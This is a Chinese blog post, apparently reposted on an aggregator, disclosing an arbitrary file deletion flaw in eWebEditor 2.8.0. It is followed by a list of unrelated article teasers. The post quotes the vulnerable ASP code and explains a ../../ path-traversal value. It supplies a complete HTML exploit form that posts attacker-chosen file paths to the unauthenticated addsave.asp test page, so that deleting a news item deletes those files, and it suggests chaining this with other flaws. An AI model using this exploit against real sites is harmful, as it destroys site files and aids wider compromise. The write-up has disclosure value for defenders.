Ewebeditor2.8.0最终版删除任意文件漏洞
作者:oldjun 来源:oldjun.com 发布时间:2009-02-17 12:16:00
这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:
' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName = oRs("D_SavePathFileName")
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") = sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")
End Function
无 语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中 d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新 闻,于是主目录下的eWebEditor.asp不见了!
下面给出利用的htm:
<HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun(http://www.oldjun.com)</TITLE><style>body,p,td,input {font-size:9pt}</style></HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加新闻</a><b>增加新闻</b><form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"method="post" name="myform"><input type=hidden name=d_originalfilename><input type=hidden name=d_savefilename><table cellspacing=3 align=center><tr><td>要删的文件(相对路径就可以了):</td><td><input type="text" name="d_savepathfilename" value="" size="90"></td></tr><tr><td>新闻标题(随便填):</td><td><input type="text" name="d_title" value="" size="90"></td></tr><tr><td>标题图片:</td><td><select name="d_picture" size=1><option value=''>无</option></select>当编辑区有插入图片时,将自动填充此下拉框</td></tr><tr><td>新闻内容(随便填):</td><td><textarea name="d_content"></textarea></td></tr></table><input type=submit name=btnSubmit value=" 提 交 "><input type=reset name=btnReset value=" 重 填 "></form></BODY></HTML>
删除文件漏洞一般是配合其他漏洞使用的,比如目录遍历!
猜你喜欢
- 4、TLS支持通过修改/usr/lib/ssl/misc/CA.pll脚本实现,以下修改后CA1.pl和未修改CA.pl之间的对
- WindowsXP专业版操作系统中最多允许10个客户端的连接,在Windows2000服务器版或Windows2003服务器版操作系统中不存
- 继FoosunCMS4.0版发布以来,我们收到了广大热心用户在使用测试中积极反馈过来的不少建议和意见,同时我们的测试人员以及研发人员进行全面
- 在搜索引擎优化相关的文章中中经常遇到“SPAM”一词,SPAM通常用来指垃圾邮件,不过在搜索引擎营销中所说的SPAM是专门针对那些欺骗搜索引
- 最近不少站长开始考虑和选择在国外注册域名,由于很多站长对国外IDC市场不是很了解,害怕上当受骗无处维权,这里就分享一下在国外域名注册的方法和
- 康盛创想(Comsenz)推出的Manyou开放平台(官方体验地址:http://uchome.developer.manyou.com)与
- 想必大家这几天都体验了一把Google最新释放的SearchWiki功能了吧,我们确实要佩服Google这家以强悍技术驱动的企业,想方设法去
- ADFS是Windows Server 2008 操作系统中的一项新功能,它提供了一个统一的访问解决方案,用于解决基于浏览器的内外部用户的访
- 第一步:准备好精美、快速空间、网站程序并发布少而精的网站内容要点:不求程序功能强大,但求程序速度快不要用采集功能,发布大量垃圾信息 ,就要手
- 声明,此漏洞已提交叽歪官方处理(2009-02-05),本案例仅作技术研究。由此漏洞造成的所有后果,本人不承担任何责任。参加集团“精武门”安
- 关于优化说起优化,其实最好的优化就是提升硬件的配置,例如提高cpu的运算能力,提高内存的容量,个人认为如果你考虑升级硬件的话,建议优先提高内
- 对于URL渠道,大家可能比较熟悉,当您有多个网站的时候,URL渠道可以跟踪不同网站的表现。而对于自定义渠道,可能有些人还不太熟悉。自定义渠道
- Web UI是从Windows 2000就开始集成的Web远程管理服务。通过该服务,网络管理员在客户端通过IE浏览器就可以对服务器的常用服务
- 应用Google Adwords的营销者们现在有了一个新的定向选择。Google Adwords广告系统升级后,商业企业可以根据
- 网站程序上传到服务器的各种方法汇总,制作好网页程序后,如何把网页上传到申请的空间呢?为初学者做一个汇总。上传的定义 上传就是将信息从个人计算
- 使用过嘀咕的“嘀神”插件的用户都知道,这个插件可以实现将嘀咕信息即时同步到其他微博客的功能。对于Twitter重度用户,可能也会需要将Twi
- 近日,康盛创想BBS与SNS社区产品双剑合璧,推出了Discuz! 7.0和UCenter Home (简称UCHome)1.5。这两款社区
- 8月10日阿里妈妈广告平台发布后我就是申请了代码,投放了一段时间后,还是有些经验教训,这里与大家分享。第一: 及时查看广告购买情况,避免缺省
- 有好多朋友买了Godaddy主机后不会将数据导入到Godaddy MSSQL数据库中,犯了难,为了帮助大家我们找了一些教程,希望对大家能有帮
- DNS服务器所提供的服务是完成将主机名和域名转换为IP地址的工作。为什么需要将主机名和域名转换为IP地址的工作呢?这是因为,当网络上的一台客